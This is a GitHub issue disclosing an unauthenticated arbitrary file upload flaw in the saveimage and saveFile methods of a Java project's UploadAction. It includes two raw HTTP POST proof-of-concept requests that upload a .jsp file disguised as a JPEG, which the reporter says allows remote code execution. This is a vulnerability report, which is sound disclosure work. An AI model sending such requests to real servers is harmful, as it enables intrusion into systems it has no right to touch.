Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Arbitrary file uploads exist #107

Open
a02goblin opened this issue Aug 18, 2023 · 1 comment
Open

Arbitrary file uploads exist #107

a02goblin opened this issue Aug 18, 2023 · 1 comment

Comments

@a02goblin
Copy link

``The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

image
`POST /diaowen/up/upload!saveimage.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
`
image
image

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

image
`POST /diaowen/up/upload!saveFile.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="basepath"

files
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
`
image
image
@easyandeasy
Copy link

easyandeasy commented Aug 18, 2023 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@easyandeasy @a02goblin